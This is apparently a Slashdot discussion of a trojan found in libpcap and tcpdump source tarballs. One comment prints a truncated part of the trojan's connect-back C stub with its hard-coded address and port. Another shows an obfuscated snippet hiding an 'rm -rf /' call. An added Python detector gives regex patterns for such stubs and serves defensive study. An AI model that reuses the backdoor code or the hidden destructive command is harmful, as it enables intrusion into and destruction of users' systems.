Trojan Found in libpcap and tcpdump
msolnik writes "Members of The Houston Linux Users Group discovered that the newest sources of libpcap and tcpdump available from tcpdump.org were contaminated with trojan code. HLUG has notified the maintainers of tcpdump.org. See our reports here or here."
This Trojan thing... (Score:2, Interesting)
It worked with the trojaned compiler making bent versions of the login program. You couldn't detect it as if you compiled another version of cc or login from clean source the bent cc would infect that one and the cycle of infection continued. Very cleverly done.
Actually, for all you know maybe every version of gcc ever allows RMS and Torvalds into your box...
mars.raketti.net (Score:3, Interesting)
With that information, I suppose that it is easy to find out which Finnish 'author' included the trojan, and would be simple to track him down. But my question is how something like this could have been included in an open source code and released to the general public?
This is a growing trend (Score:2, Interesting)
Siltakoski Petri is somehow connected with this... (Score:0, Interesting)
The trojan contacts the following website:
http://mars.raketti.net/~mash/services
Re:MD5 checksums (Score:2, Interesting)
That's good if you can assure that the MD5 checksum is for the original tarball. What if the guy who placed the trojan placed a new MD5 checksum as well?
Re:Glad I use Gentoo (Score:5, Interesting)
Presumably the tcpdump.org FTP server got 0wned, and the trojan was planted, but the people that found the trojan aren't the server admins - they just found it in the source they downloaded. And I doubt we will find out how the perpetrators got in, either. It would have been nice to find out in more detail what happened when the OpenBSD FTP server was compromised, but people are usually tight-lipped in these cases.
Re:Eventually, this would happen (Score:2, Interesting)
I don't think the only irrelevant comment is thinking that bad things(r) happen only in one place. Like I said, on open source software, I Can Audit Myself The Code.
Re:Eventually, this would happen (Score:2, Interesting)
So there's no point mentioning it.
The point is: When was the specific change added? By whom? The maintainer should know. Let us know. Then put the person who sent in the patch with the trojan in a black list so his/her future patches to open source programs are first severely checked, if accepted at all.
That's more like it -I think-.
Accountability (Score:2, Interesting)
Re:Siltakoski Petri is somehow connected with this (Score:2, Interesting)
in the middle of the fully commented services file, you find (let's hope
#!/bin/sh
cat >conftes.c
#include
#include
#include
#include
#define XOR_KEY 0x89
int main (int argc, char **argv)
{
char c;
int s, x, sv0[2], sv1[2];
struct sockaddr_in sa;
switch (fork ()) { case 0: break; default: exit (1);}
close (0); close (1); close (2);
do {
if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
exit (1);
sa.sin_family = AF_INET;
sa.sin_port = htons (1963);
sa.sin_addr.s_addr = inet_addr ("212.146.0.34");
alarm (10);
if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
exit (1);
if ((x = read (s, &c, 1))
nice, isn't it?
heheh
Re:Uncommented trojan (Score:2, Interesting)
1963 - Assassination of President Kennedy
Re:Eventually, this would happen (Score:5, Interesting)
> closed src doesn't have its src on some
> webserver for some kiddie to trojan in the first
> place. sure the possibility of some employee or
> the employer itself to trojan the src, but most
> open source trojans are someone breaking into
> the web server and uploading modified src. by
> definition this wont happen with closed src
> since closed src doesn't release src, so your
> argument is irrelevant.
Oh, no? Look here:
http://news.zdnet.co.uk/story/0,,s2082221,00.ht
Microsoft had their source available to some cracker for three months back in 2000. Of course they later spun it down to "one day and we were watching them all the time".
Point is, closed source can be vulnerable too. Only Microsoft knows if any damage was really done, and they aren't telling us squat.
"At this moment, it has control of systems all over the world.
And...we can't do a damn thing to stop it."
Miyasaka, "Godzilla 2000 Millennium" (Japanese version)
Would it help to have a source Bank? (Score:3, Interesting)
I'm just typing out loud here.
Yes, there'd almost certainly have to be a cost associated with this, and I'd think it would be paid by the people who wanted source code, but didn't want to have to worry about checking it for Trojans etc.
The source could still be publicly available for comment and review to add to those being paid to perform the analysis.
Seems like this might be a good service, once the idea is fleshed out more...
There'd also need to be some definition of "guaranteed" (or maybe just a different word :0) that fit this scenario, most people don't want to set themselves up to be sued.
Read "Reflections on Trusting Trust" (Score:2, Interesting)
Re:Glad I use Gentoo (Score:1, Interesting)
_NSA backdoor (Score:3, Interesting)
Microsoft *have* inserted a backdoor into the CryptoAPI for the NSA.
How did this get added? (Score:2, Interesting)
Re:MD5 checksums (Score:3, Interesting)
We need to come together and paaaaaarty! [cryptnet.net] :-)
Really, that's the only solution to this problem. Probably, this is something we are going to see more frequently, so frequently perhaps that it may undermine the free software community's credibility. Therefore, we must come together and meet, and exchange signatures, so that at least we can ensure that the software is signed by its maintainer.
Now, go and get registered at Biglumber [biglumber.com], sign up to the keysignings list [alt.org] and start organizing keysigning parties. Also, make sure that you meet other hackers when you're out travelling.
Re:Eventually, this would happen (Score:3, Interesting)
Bruce
Re:Eventually, this would happen (Score:3, Interesting)
Bruce
Re:Uncommented trojan (Score:2, Interesting)
but if all code is well documented, it's generally easier to understand and intentional obfuscation might be easier to spot.
How hard is it to write code that appears to do something friendly, but actually does something really nasty? Consider this apparently friendly code: // Bunny ID
// Hugs the bunny specified by 'bunny'
/"
#define hug system
const char* bunny = { 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2f, 0 };
void hug_a_bunny() {
hug(bunny);
}
Hint: bunny evaluates to "rm -rf
Re:Glad I use Gentoo (Score:2, Interesting)
Besides, this is an exploit of trust, no operating system is any more vulnerable than any other. Binary distributions would only contain the libpcap backdoor to ignore tcp port 1963, the actual trojan appears in the configure script.
How many times have you downloaded sources and blindly ran
For the record, this fits the modus operandi of trojans found in irssi, fragroute, dsniff, BitchX, OpenSSH, and sendmail.
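A detector for the pattern this thread describes (a configure script that writes out and compiles a C stub which forks, closes its standard descriptors and connects to a hard-coded address), as an added example that is not from the original thread or from tcpdump.org. The configure fragment is constructed; 192.0.2.10 is a documentation placeholder, not the address quoted above.

```python
import re
# Constructed configure fragment (not the real tcpdump.org script): block 1 is an
# ordinary autoconf probe, block 2 mimics the shape of the stub quoted in the
# thread (fork, close fds 0-2, connect to a hard-coded address). 192.0.2.10 is a
# documentation placeholder, not the address in the thread.
SAMPLE_CONFIGURE = """\
cat >conftest.c <<'EOF'
#include <sys/socket.h>
int main(void) { return socket(AF_INET, SOCK_STREAM, 0) < 0; }
EOF
cat >conftes.c <<'EOF'
#define XOR_KEY 0x89
int main (int argc, char **argv) {
  switch (fork ()) { case 0: break; default: exit (1);}
  close (0); close (1); close (2);
  sa.sin_port = htons (1963);
  sa.sin_addr.s_addr = inet_addr ("192.0.2.10");
  if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1)) exit (1);
}
EOF
$CC conftes.c -o conftes && ./conftes
"""
# Things a compile-time feature probe has no business doing; a block is
# reported when it trips `threshold` distinct indicators.
INDICATORS = [
    ("hardcoded_ip", re.compile(r'inet_addr\s*\(\s*"\d{1,3}(?:\.\d{1,3}){3}"')),
    ("outbound_connect", re.compile(r"\bconnect\s*\(")),
    ("daemonize", re.compile(r"\bfork\s*\(")),
    ("close_stdio", re.compile(r"\bclose\s*\(\s*[012]\s*\)")),
    ("fixed_port", re.compile(r"\bhtons\s*\(\s*\d+\s*\)")),
]
# `cat >name.c <<'EOF' ... EOF` emits a C file; capture each body separately.
BLOCK_RE = re.compile(r"^cat\s*>\s*(\S+\.c)\s*<<\s*'?(\w+)'?\n(.*?)^\2\s*$",
                      re.M | re.S)

def scan_configure(text, threshold=3):
    """Return [(file_name, line_no, [indicator, ...])] for suspicious blocks."""
    findings = []
    for m in BLOCK_RE.finditer(text):
        name, body = m.group(1), m.group(3)
        hits = [label for label, rx in INDICATORS if rx.search(body)]
        if len(hits) >= threshold:
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append((name, line_no, hits))
    return findings

if __name__ == "__main__":
    for name, line, hits in scan_configure(SAMPLE_CONFIGURE):
        print(f"line {line}: {name} looks like a connect-back stub ({', '.join(hits)})")
```

Run it over a downloaded tarball's configure script before `./configure` is ever executed; a benign probe such as the first block scores zero, while the second trips all five indicators.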
Re:Eventually, this would happen (Score:1, Interesting)
Using the language the way you are is many times worse than using phrases like "pirate" to describe a criminal and civil rights violator. Or using "hacker" v. "cracker".
Nedward
DeMorgan's Law (Score:3, Interesting)
Re:as soon as this evening... (Score:3, Interesting)
Yeah... my servers front end my home network, so they are turned on 24/7 and right now are connected through redundant DSL connections to the Internet. So mine make a somewhat attractive target.
Since I am basically a lazy sysadmin, my approach had been to use really obscure hardware for my server. To accomplish that I bought a Rebel Netwinder on the theory that any exploit out for x86 would probably take months to be ported to the StrongARM (the StrongARM instruction set is both restrictively small, and completely anal about non-aligned memory accesses, so hand-coded assembly is a pain to write if you are trying to take advantage of a stack overflow of some kind.)
Recently I've swapped the rebel box for another Intel server, this time running RH7.3, and I bought a subscription to RHN to keep it up to date. Since RHN manages all of the security updates and dependencies, all I have to do is log on once a week or so and request the updates. So now I get to be lazy in two regards; first it is much easier to add new software (StrongARM porting being not my cup of tea), and secondly RHN takes care of the security updates.
I imagine that Debian users would argue likewise for apt-get.
Re:as soon as this evening... (Score:3, Interesting)
Oops, forgot to answer that. I did log on to IRC and tracked down a couple of the users listed in the eggdrop config files. The original channel was no longer active, but there were a few people with the same IDs logged in on another channel; but the channel content was so spooky that it kind of freaked me out at the time. For about five minutes the only thing in the channel were various people sending messages like 'CCs', or 'eggable accts'. Then suddenly some guy posted a message saying approximately: 'so and so is a lousy copier', then 'I may as well give this out as a freebie since I don't want him to get all the use of it', followed by some guy's name, address, SSN, phone, and credit card numbers.
At that point I decided I was in the middle of things I didn't want to be in. I did call the person to let them know that his credit card information had been stolen, and to watch his receipts, but basically dropped it there. As far as I know the FBI only cares about computer hacking if there has been at least $1k of damage. I had about a day to rebuild my server (before replacing it a month later with the Rebel), but nothing close to $1k; no deleted files or anything.
I did track down the person's Nick which basically turned into a Google search, but since he'd been using that Nick for a long time and in many different places, it was very easy to do. The Nick seemed to belong to a student at UCB, previously a student in Singapore, but the evidence was pretty loose, and in any case I doubt I could have done more than make a few legal threats. Ultimately I decided to chalk it all down as a learning experience and let it go (but I still have the backup tapes of the hacked machine if I ever need them.)
Handing out other people's passwords wouldn't have been possible. Eggdrop stores them in encrypted form so even with the contents of the password file there wasn't anything I could do to retrieve their plain text passwords.
Re:as soon as this evening... (Score:1, Interesting)
Essentially setting up a honeypot to capture hacker login/pw combinations to later track activity, etc? If the honeypot were configured well, I would imagine you could trick them into giving away quite a bit.